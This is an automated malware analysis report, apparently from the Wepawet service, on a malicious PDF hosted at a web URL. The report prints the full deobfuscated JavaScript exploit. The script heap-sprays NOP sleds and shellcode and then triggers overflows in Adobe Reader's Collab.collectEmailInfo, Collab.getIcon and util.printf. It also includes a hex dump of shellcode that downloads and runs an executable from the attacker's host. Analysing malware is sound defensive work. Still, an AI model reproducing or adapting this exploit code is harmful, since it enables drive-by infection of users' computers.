Wepawet » JavaScript Report for http://ogzhnsltk.com/plugins/pdf.php

Analysis report for http://ogzhnsltk.com/plugins/pdf.php

Sample Overview

URL	http://ogzhnsltk.com/plugins/pdf.php
MD5	85102650c24366f20be07642b58e7b23
Analysis Started	2009-06-30 07:17:41
Report Generated	2009-06-30 07:17:50
Jsand version	1.03.02

See the report for domain ogzhnsltk.com.

Detection results

Detector	Result
Jsand 1.03.02	suspicious

Exploits

No exploits were identified.

Deobfuscation results

Evals

J1YfgS + DMvsh93tAYir + qXK0fd + nf1oVzp1zNggqr3 + ejkume5KNvPuGY + TtNFuClt2mtPSZFJc23 + 
Gvo2z0OvYIB8s6U + yzgtsifl88LNR + MOTKJIMJRk + Uz4Q7wWb5VHy + u1dA8lVUCT + 
VgoCyAVQukPxBWuh8yC + MwbPalXLH3YkvFZ8 + BjdeeN5cZaWGhUT8R6W + Hq4N96wt1BS9QBl5q + 
Y0SijyzRS + HYuY6wP9JXEGQFStNs6 + DxvI7N2pL2HoUpj3vfR + XyzIFQYhJwZP6WKOciQ + V5RjsvZbyUH + 
rYGPqV + dPC0Ll + lRItpucFNgg7ZcfBaAS1i + QPZDFyQP + lBylUsaOUqlBXsk0Yvj + zNkR701JP + 
CjoJvn5PffoAVaL + DT6C21wkOgBUpBoFAX + kTTrYsWE + bhjH3ml8zm9vW + Rbh2Rtpg4NkXqc7j9 + 
lRq5jsrU1qG0mngNV + WpOYVRvGzms7W2 + SxrVgk + KBkDRuzFaNkI + j9qiamzaZr + J6t74lbjWyvH + 
lMBBclYM5lVvT6 + zTfHLLMESQ15AW36nES + BP5kyQpkvkE2Thhk + e38GVXHZhncmbrE + IHJKGk + 
U1gvEhOv + a9xRGEwnVWVJ0Iv1X + aIqqYa1YGvmyJiMSgniuk + iQH2kQJ + ORqAkg1I + 
H2qXwdVGMsj3gRwQxNiy8 + HHnb8xLoyd61Ucx9 + jDU1wW + rOT8Lr + dKzzbmajkvYj + Fdj4GgBPtgPqD + 
DEhEaY + FuY4WKeF5Zon9RWCiDO8 + Z5XxHdCzrnXwh6zEQe + QVDIIMjpYR3wZ0278 + CjKIb8qYpwY + 
IMCXrPp + fmZ1L23IaCJgKdQev2mlZ + Ti8e5KCwk28Wb8rcAAC + CUth8JM + TL9oujW3Ob + 
RbY8dfdEnVqxf4 + c0w3HFPJa + C9VHfYgHvHq + svWg0JB1Hr5c21fIG5c + lclMtQva + hqrYtm5ZwOlxf + 
e2If2yyH4 + A9fMVZmQ0VH + H4Ao9kkWVhC + biVokTm3XNACjfl + q7u2Nv6YjEIUl + iBxxuTmexYgUwrg + 
dXSBeMD2IJ + t3XsWIgiGecjQHhzyBwq + jbOKn3 + J24yKd2sVX + gCFRqsBHAsH04DzvpOF + zQweUv + 
r8wrdT3 + fjUgbfymXFv + hTvXIJmvkjaE + ZZLaRy5Tony + VPdSBBi8nB4KUN8 + j8q1LUZ + 
F62f0UTwTyM + EQYI9g + rKjQo7XFDNFZs + DGxqv8LP + SoNQvozDxfJHOj7VH + ujfbIYQYWHUdd + 
VhRH9N68b3muKBeRgwm + ncOiApGg7 + xJjf2BwAY3IA666QGkr + sgeNI36T + oM0y8ThnVtjfS + 
Wxcr3hHJR0H9ne + Bqkth84fFWN + i2HlhjY + aMPh4h2 + OqIdew5UgyBn2r3YF5ZXq + 
kGOvcodgWeBMwo2tsVZq + aNsZQQo + L1LMHcl + wFZqv7V7SR + bUKozuegI + ZFix5ExQaF3LSIvJD2oK + 
XGFya4yVienFuWDykBPKQ + OgtjcDxe2H0 + jX9sb7NKlAag + bnfRz5mQWTJG6 + eDkYVtp42ie96yuGZ + 
ExMFOLJAlpd + U7jcJTApNzs + BiXXnWR562 + eRGQna + rZQEeWyH + LRRfoRY + b06lwbC2hE39VSw64 + 
cVIB3GSsht + bWK7kUCVRnhSVvUdRxa + C183II6ZkxHeWnycXTo + GuckM8grl8oMepTh + 
GlmhWkyAGm0sJchMWK + stSokEwYaaO5HW + Z5DNoCX5yhxHKeerzmkRa + WgW4H8 + xLOxCTBZHN8LLoId9 + 
jIzw5jOeE5BHMIiih + zuArTREanaP6DX4WX + eaHOFVTQnpiWXQCS + w5v3JWptw + L8Tyd2y + 
gJNToqtcgc9E3Lg + nPcfi0Vb6QjZPNaNbt + L5ibxLIaTWcoDF + UpvwyQY5qIdFfEdG8 + 
sKq1IBItfoVT2lh + tgeq8CuyUXEAl + wQtGlkG5 + NYxbNT6OFm + QwR74e220YF + fK8jENVydZuCXVZ2 + 
gyGNEDpLGTMI + uvYvGffU4AThkO + DIuTJVRZtgni2 + DCOMoJukZaP + QdaXKLvEdqhwL9WEp + 
hwqN9EjxY + Gh8D8CrijC4fQgV + BcqG967S + mwpBBY9 + YCqsPy5Hgn + PjTtQy23p + 
gBuOdwLS8X2GHD80 + Y6Eum2OWVIw + bJzJcBD2oANHIuJYC + IgM0la5XcS48k1b5zuh + 
I9izI7Hb1aAD7qZGb + aK0mnDtYD + TcCPJNX3 + Cq0dR0EbNKRwb + P8vCtjPnHc + XuphDDFGZ6PDXZ + 
A9xmauNd + kJpu3FhKs1E + HiSvxjU4 + fiajAigwJaKw + LdmWg2D2u + BFcwhXtQ + dwakWJuFzr + 
OZBVBp + rhWJvXD0n + V6UNzv + xwVASo6io + XHO9mZy4HUNC3bMpR + dKpRGEOlPraU + 
MPQqnZdNXhf35r5fEu8g + Dw9UBXGaOr5xGVo + u5RSc98eDzi + zDd1urx4M9adj + YUowlJlqODI1LPeZON + 
tc1TXsRaFZBsJAN870R + Azp6IpQhU + U7sSjswGlNq2x3tHCH + NJQpBQfGiVhQzhXrA + lk7WWUNXSPRjb + 
S8u0x6ac + NJ84j8kGzvXj34 + VWRnyqFhSypM9mSi + io2Xsl + kd3eYZOade85S7v + RoNgdkoQDXq3ZNu + 
E4YNh7x + yhakpfCvbuk + pbOjQowxfyX4ts7RF + oYCtGnd6Tq25l + q3N0mnyilehIhbB + H4RbbeVrR + 
vxu1yzlk30 + OowtWiXE2FqC4tdfU + OAMjJJeK + fd62fEvTBo1tMFu + Y68eykJ + V3Uplo9 + 
b9P3ERiTNBeCCYYRTA + TaoVK9y + Jcn9RvYZLbnnJG + GVvNiTw0w + DhWwCr5BEhzN9vviGWV + 
nqmFLhd4BaD8hued8WiJ + DPI9YD5GUblZRYpnGSqR4 + GZlzEP8k + GQVXje6xjLSK + G2mgqawJRNMVx + 
pVBWcve4RB + W7HkpdCAlDx + N5XNNyljUirztObp3f + RESMVCC9PNtcKLhsi5qUo + dCfK74wv7bCK4 + 
uqGlzf9 + KITE1Mx5 + uRsYeYslcogiQt4UStkD + xQMljq1jC + roPPgx5Fq + creWa5PdZr + 
wJ6QkSCTJCDVA2 + CZitdxjToOzPTO3 + pGaMM17oDa8QndapYAXS + FUCHJaGi5fl8vMTHNa + SaAD1yrboPl
 + AsZq5q0f7skmeri + SK1Ou7y6Kz5Bbsb + uETv5YmEE + I8yflqNnBOB6UABo + mG1l9b8M64Repft + 
imsOYimLtAXz + phAUrRUcZ7kwC + VNqd4jNqbmPKYkDjID + YzOtqpO + CPUDLg2jXfnH3dto + 
WDNoR87eW63 + IwroQGJdc1fMYK + wpNoiBr + KZfMgl2Dr4envSD + JmronX + WLrLBF0tR1p1fCh + 
UEvIHZ7C3K + ypBDcjO + vbk0qt4H + ytIa7z2KuKcUQpWkDLwR + jfqwGa78TAOO5gyA + 
z1VbK86lxcVAxScv9SsP3 + aWW0uuDbtOHtutE3yzza + aAYymU7EM + lGL2nVwhjYb8pU2i + M4hj4I + 
qDqDzKJDhpU4rHY + EzHMaPB6RuoUcXXumlkzk + TJxm0Sp1jOojfAJ6 + uOWHD2 + dkZoXK + 
OW5eq3RzUHzEfoxLz + cQMfwdtx + kdXLArv + bvZYx2XSI + LgyLeJKvkgbhKUer9C + CJ402ziZwk7P + 
Rd71yk + PJg51IlKmQCucQEgZFf + koc4u26X97WtQqZVrrHBe + ROZKpn1P3giqIlkJrISxp + 
vOguuXmBjQt81ExnFNp + m6fDqQXh + yzfZK4FFym30VT4dTHbGW + b6R4lfuCCcwCHV + CLkmJXoT + 
BHWgkoI + iKG8mKtRE6 + Bq3r9XOTIAnqzGtHma + qas4v0AiT40h0 + eYBfgj403EwsDDlU1MWbE + 
yWNkErnOZxD80tosw + AvBunP9Zt9wQjA + pGYkVPYtyV87e1uXxsT9 + kHXvqR5nrnxs4WcYwBSv + cZ2Mawt
 + VoNgbeEXVfbIXPG + uSm42jEUev5fHebBCQY + p3D8Zi + dB1LaHl44o6n4 + xRyd8GIjRV01OCDWmwJ + 
fxfXEQ + AIFg6IFXHteXCOzhX + h7kEcWAwT8b2L3c + fIJjaZGsSuPfIPMqPT + Gd68n3avdcGgFuyYdZ + 
kuRaprG8Gcyg6ZJB + F8DH3ruJY0EXis + VpmYQbQgjhJiN + RIhbypoGsgABE + jQm3Iss6RJ + WszQZJ9wi
 + JeJPT9gMprY5ByqDGj7L + kP34OSciaZR2EkQ + Lt75jxcn0adMrNT + EYsGbHiEzJnQL2Blj + 
gsooqQbz2FMt + Vp8BhNnz72yQpPlraXbgP + GUFq6ErLblyQsA + aFx8Mz7moVYg76Hm + 
phGkXMzPiaBg24r0JoHf + VNSct2Jz7ambI3Mp + xMF9xQpyUg9nUQTIn + jvgxEg5pS + 
C9V3yvPD4MesL9YUw + VuQMiMI + GKX7ONY5V5 + YTzXg3tLuFU + lkQWfqtNDBnX + ftw7R2bV95VflXZ8Sp
 + gvZ2SEsM + o6YPdHJZNlazHj5 + bPpJzwmoXiNZAcR + xEX6eAM + skkiKjz5nlUd6Ta + mH9Zfh + 
xH0HWgNArj8bUq + NDp22aVegyEX + LM8v5r + CD0kuWumG + BNktKxiLzJqdzpsX6Ee + xJVFWfzRBuDR + 
HbCqv0YG + hr8mrw + vO2t34CYIjDHAPBOr9z4z + lDXAMPI9HEmfGg + MJsHbbVtmu6AmE0pD43k + 
gOAWXRlK821pLs8wT + XqGXvQJ0Z0NdB8saIP8jA + qrCRhXKoU + lQK5yFUHP5Qm + qcuaDCzLwAm + 
TMEVtZJN + fkhSixx1N2Q0k44KGGK + GDUO2qdXkCq + Vaaq3JnzJA1kKknO64f + nesu4u + ZgRVsIdStT + 
iCHTVSUGmF4BL7qklj + RodQU6vNNZqG4 + MTKpznK + ZaZIlvPbgAKLzyl + C4grRGiiJ + 
YBesBRCQ2mjmh9ONJiiIh + ZnlAeCQMvjQ8NIIp + ljqGTdyc2Lvk4ERX2D + NgQ94LsTSGll6 + 
RVwXzZVbaqX + KulmSnzAUPJYl + f2ESn1Y5VU + AV587eyd + IsPmLDmVhCpGy2HCT6C3 + miXlDbsKGqxG + 
KN45apaI3QY1Rq + TvwPx69Ur + Y6kgLaecK2fPcU1vXQ + uXrKkmGAkMJEDfKxMgY2I + O4xJgSJbzj5XbP + 
NOfS92lN + uRhDoNmqfg + JdzZ6I + B63Fcdeu + wKMAM8YbZFpNdcDII8 + mHg3Zr8c8 + 
EGleI71TS924iHt + JuVJDnQ068 + ZfzJH74XshqyiJQrL + bZcOfXtykhPum + W7RWPidSGWA7Vs + 
xwkmQJPoywi + nhPMbBuhdQ8L5acb + Ri7d03NwTg + AHfH1czPzbbtJEKQaO1C + Glv7O69m2bSMt + 
yetkdJjEudX0x + fjMzvMkrS0w + AvxDOK7Wy + GGcJ1rEdPObN8xN4J + kumHrNCoaa9 + 
e78hNj2NaG21ecOm + xlpuskgAb5MQf + sZM4g5RP7p1N + l22TPn4Adx4NeDz + nZPOXy + 
nafp35vr6Ii8KCW9Gg + DEj0tx9cXY1 + qXlfCahHWZN + aIU0U1Hlh4zRDsOMVvu + x1SGfeqNwM + mJCFnL
 + iodVVhVxuOLGtHBOHd + SxIVKEsHX5W + hQGA5mglH + gffzvZH8xZk + SW39rH19p6fBVw + AZi3L1g + 
qffwFw4CW + bp3rxt9y3x4i9ZfU0N + QUNDV4sSIpVVL + XKOBIIJGLHK4Ptiu47 + iXUe4XXVpN2LjL + 
M8WxQq + Yl8YpXSYSVet49Y8g7cW + BdrCzWKVUkMjVUHL + WktTFYNJgw + CN33tWgkifH + BBmnXVJ + 
Dnf4XYXn7v7nrXBuZ + GQGp0w7C + bt1fOKhCzkjYI + oeDdS6AdzkiQ2XZxdm5X + lkv8R97CreUOJ + 
w3mnDQnx9Eyfn + vJZ1qMkmTB + VaOmEsBYbELORlC + htQOZEKsoLjA6W + vHQDfDSYP20eMY78lV1C + 
maQESEZCPfi3x0GdN + KBmkLR7tXDe4ErxoH + cHWlTvRCyOLF2iyDVj + uwqRU47XIyU8GgPmS + Qit6hIRw + 
a0vWff6c + iX7Zeesc9zspP + yHJNBO5Tp2mz + eJfdOI9vPhZ4aCC + J52zjJI7Uh + ayXDlXB5CoT + 
zxPufzxFB0pGBpzU97 + tpIxNWiuhn8WHcTgW9gUN + pdD9p38JAEJ1WHN3zHk + CPG53jlYsR + aGJgTR + 
qWZphn0hKQ5NQM8DmNI + N84NzVQ + Yo7jGcFq + Ywecdy3iLT6 + Hgrqzgy34yXTEMaxdDCTf + 
Y8In7KWRnbuU + KlT0kW + Di5fwRFt + dS7Y9FgQ4ml + TEZB05euYnf51 + h9gJZvD + mOJCXZtxcf + 
TCuJN4 + s3yvqdzq19WKiSXN + FrZOQTM49 + DF3Pd7mf + ShVihMiqt4Z + SawCRWbszxv94BBTpHFU + 
Nx15fMnV + Vq6bQ2osX + YkWNgfRrquh8AB + h8CXnYLIoBNPbPETw + oET3u9TmyOT7Yeagr9TQT + 
tEeAeFZsjWXy1Z + J94e8R8D1mnhdv + T4OxI38xIhq3E + c1EwsMz + UTRfhRSV97QJ0pGSs + QPB7FD + 
BdEYZ8uZeO1K7Smbbs + Hu3rBUkZuvfA + N1nNYNUTw0rxTxP + iZ18bvAS7 + UCgZ9MjHMXeuu9 + 
rrIFplDF2mF0NBJ + JHy4yX + QKHSho8cjG1aYFQ + UTfLFvUc7nT + clWMJhhaAOPH29 + g2j6H0Pkok1jE + 
zq37Eoca8KIiUh8miFJj + aP29olxZmhnPXq + rle8MlSeTxLbj5r3oqR + TyGbwpNddmATHv8PHtsw + 
npIyYMpbAf4zeJba0yEm + mOF4KNTcGLYeAqc + rCSKN8NNmhyN + Nxbcj1smKGFwWbUAmLnVY + 
YqvNDIAvHXlE0Ox0Hk + RX1P5buFNG3soIikfw3qr + HNdZW2XgIH0pHZusT + AFkB9YUrIAnL + 
QfgOIFuKmac4kSL + cMDnWT + Vhc7CT + jMGlMwRlEg + jYSGBW2erK259XY + VFAnRdCouxBq + 
Aw66ceYtq5uUvFW + uO4Z5JjrlN5ZI3k9RhEWJ + k6Cj08E6Mk7kofp8P + PsmlS5oDDFuSmDLrQ51X + 
b7u4CfrrUyHBr5xJ9l + XM2QpneAe5FfcYlWbyB + JqgR8sI + bqbKc8hdY + KQDg6IwluUXR7VdYLJzS + 
PIe3tye2f + EaBjnso + ypazJ8RQc5yyO + iQaG5dA4HCiZmuIZm8ebh + dvp7LSAKQ + 
UIr0Zvnkz6wheibxH + v6w1nbvchH5sbUR + KLbUHPEGUAy0sa7Az + n8zzjvcRCgJoB + oiXNDo + ZR6Gb5P
 + meWfdimdiVYKwk2GZC3H + HPUYCwdTXht3MQh1 + jUdrzCBwxCDWPFo9fI + MrFKLn3EpOeXPn23e2 + 
gqyC4BiSRWb7pIy5 + YJrfYh5CE + y1FWfGlVExZQg3rCd + E2ww7ZGxEoeI2sm29JgO + vCd3l4in + 
uvRtxNp4x62B + kfUvYHw + Wac7fojian + QNiMpb + vDQNAWOMQ5rLd9HKj + MQOj07JxXhfuWHDjiau + 
zyGf481gGI1 + nCQOwaVFX3wDxTUADD + v8RkN7nV8TlPUlc + W0YVeo4hkGeElp + LyaYQLwX0Rec + 
x58yg28FXm4aToq83c + OTaX31tyY3QCfd + wmcxojDLVG + gz5m87O5ayc + PzVbYX3kDg2z + 
hzo3C0XS6XXre + dFiFEKsEqUmOWXbCZbV + QPXlY6EdclVGQkzfz + iXDA21YYXAk7lFfBnQks + 
gOUQtkqekW + U54qE6rnd + WxOVjeBu + dbeJG4nhw + uYaJ5DN95bDvOqKMFq6 + u21Kcfe + 
ciSae20FKDShL + PIZThQo5feAYfAt + BqXCYznD1wSK0v + HVSK5w3Uk70OGi5RbNH + QZq8N49 + 
tVSTQUytp4p + kYayizFQ4 + W2RzA2pIOs + chNtAoN0iDD + G6l94T + uJuB2wc17dpO3hpj6iu + 
N74cJGAO3JSVRmPcnL + VnStcrvKgf + hOZJUcvnt7CvP + kRqQqTDCi2fcdWYyCDNam + 
V6PctIj6D9jezAVSNiB + EOo4uM28ZOiM + dnlig4RmHaVwZgS35BDT + f3WUOX + nywJK386 + 
Qo9CaQm7MMmoOq1c + iZeq43O + g1KzLN7Q8vZKWz7 + XMTPBrGBTak9 + BoApUBATWXaxfVWz + 
OV7frZ63RMEvxy4OnEE + uPOkwwL + lcrQbtviYnIdqk15fx4 + zLrwa9M + htJvFDX7 + 
T0zZsYNABEuBJa0MJUEG5 + Tc5HwzWAXcogc + KYAljMzeYIEhfX + RuoHHQLYN + p6XsiLYKj8UVrrUWP + 
wk7TIJO7afX + LEvGKT93phMZpr5hiY + U9MyFqGYE

(repeated 1 time)

var obKhb0FBfRbnsacc = new Array();
var wGqJ0WXg7xjNALQu;
function NkcYurkZILNBw1ni(se3QBZ7IWpfhA7b8, BDfl6PKOkhZgiNPy){
  while (se3QBZ7IWpfhA7b8.length * 2 < BDfl6PKOkhZgiNPy){
    se3QBZ7IWpfhA7b8 += se3QBZ7IWpfhA7b8;
  }
  se3QBZ7IWpfhA7b8 = se3QBZ7IWpfhA7b8.substring(0, BDfl6PKOkhZgiNPy / 2);
  return se3QBZ7IWpfhA7b8;
}
function DROD2VVXLBEWHqd9(AIt0hEXRv89eVYcX){
  var Q2l2XHZsSoOke2si = 0x0c0c0c0c;
  var Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
  if (AIt0hEXRv89eVYcX == 1){
    Q2l2XHZsSoOke2si = 0x30303030;
    Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
  }
  else if (AIt0hEXRv89eVYcX == 2){
    Mms21QTwXca3ACaA = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6F2F%u7A67%u6E68%u6C73%u6B74
%u632E%u6D6F%u702F%u756C%u6967%u736E%u672F%u7465%u7865%u2E65%u6870%u0070");
  }
  var ZLClcle6Z4pE5iwO = 0x400000;
  var opQUFtQnW1qgDQrS = Mms21QTwXca3ACaA.length * 2;
  var BDfl6PKOkhZgiNPy = ZLClcle6Z4pE5iwO - (opQUFtQnW1qgDQrS + 0x38);
  var se3QBZ7IWpfhA7b8 = unescape("%u9090%u9090");
  se3QBZ7IWpfhA7b8 = NkcYurkZILNBw1ni(se3QBZ7IWpfhA7b8, BDfl6PKOkhZgiNPy);
  var U4EPpsUOvKc13ZPX = (Q2l2XHZsSoOke2si - 0x400000) / ZLClcle6Z4pE5iwO;
  for (var tq2ejSRGTIwhjo0V = 0; tq2ejSRGTIwhjo0V < U4EPpsUOvKc13ZPX; tq2ejSRGTIwhjo0V ++ 
  ){
    obKhb0FBfRbnsacc[tq2ejSRGTIwhjo0V] = se3QBZ7IWpfhA7b8 + Mms21QTwXca3ACaA;
  }
}
function YOuhGP6CjiDmHcJg(){
  var cLLCnnSH6PzoD0J7 = 0;
  var qEnodt1NcD0tqSaJ = app.viewerVersion.toString();
  app.clearTimeOut(wGqJ0WXg7xjNALQu);
  if (qEnodt1NcD0tqSaJ < 7.1){
    DROD2VVXLBEWHqd9(0);
    var IvVciytoNscb3wiZ = unescape("%u0c0c%u0c0c");
    while (IvVciytoNscb3wiZ.length < 44952)IvVciytoNscb3wiZ += IvVciytoNscb3wiZ;
    this .collabStore = Collab.collectEmailInfo({
      subj : "", msg : IvVciytoNscb3wiZ
    }
    );
  }
  if (qEnodt1NcD0tqSaJ >= 9){
    try {
      if (app.doc.Collab.getIcon){
        DROD2VVXLBEWHqd9(2);
        var XWNoPOB2cLvToWmc = unescape("%09");
        while (XWNoPOB2cLvToWmc.length < 0x4000)XWNoPOB2cLvToWmc += XWNoPOB2cLvToWmc;
        XWNoPOB2cLvToWmc = "N." + XWNoPOB2cLvToWmc;
        app.doc.Collab.getIcon(XWNoPOB2cLvToWmc);
        cLLCnnSH6PzoD0J7 = 1;
      }
      else {
        cLLCnnSH6PzoD0J7 = 1;
      }
    }
    catch (e){
      cLLCnnSH6PzoD0J7 = 1;
    }
    if (cLLCnnSH6PzoD0J7 == 1){
      if ((qEnodt1NcD0tqSaJ >= 7.1 && qEnodt1NcD0tqSaJ < 9)){
        DROD2VVXLBEWHqd9(1);
        var ZIEBG8ze1bG3Xyci = "12999999999999999999";
        for (d1WuOiw24sUsOGUr = 0; d1WuOiw24sUsOGUr < 276; d1WuOiw24sUsOGUr ++ ){
          ZIEBG8ze1bG3Xyci += "8";
        }
        util.printf("%45000f", ZIEBG8ze1bG3Xyci);
      }
    }
  }
}
app.bi3pq2UrdluBkWtF = YOuhGP6CjiDmHcJg;
wGqJ0WXg7xjNALQu = app.setTimeOut("app.bi3pq2UrdluBkWtF()", 10);

(repeated 1 time)

Writes

No writes.

Network Activity

Requests

URL	Status	Content Type
http://ogzhnsltk.com/plugins/pdf.php	200	application/pdf

Redirects

No redirects.

ActiveX controls

No objects/controls.

Shellcode and Malware

Hexadecimal	ASCII
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 6f 67 7a 68 6e 73 6c 74 6b 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 67 65 74 65 78 65 2e 70 68 70 00	3.d.@0x..@..p... X....@4.@\|.X<jDZ ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://ogzhnsltk .com/plugins/get exe.php.

Hexadecimal

ASCII

33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 6f  67 7a 68 6e 73 6c 74 6b 
2e 63 6f 6d 2f 70 6c 75  67 69 6e 73 2f 67 65 74 
65 78 65 2e 70 68 70 00

3.d.@0x..@..p...
X....@4.@|.X<jDZ
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://ogzhnsltk
.com/plugins/get
exe.php.

Additional (potential) malware:

URL	Type	Hash	Analysis
http://ogzhnsltk.com/plugins/getexe.php	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	c40ae98cb5ebb21b8a6cc59afce3502c	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://ogzhnsltk.com/plugins/pdf.php

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware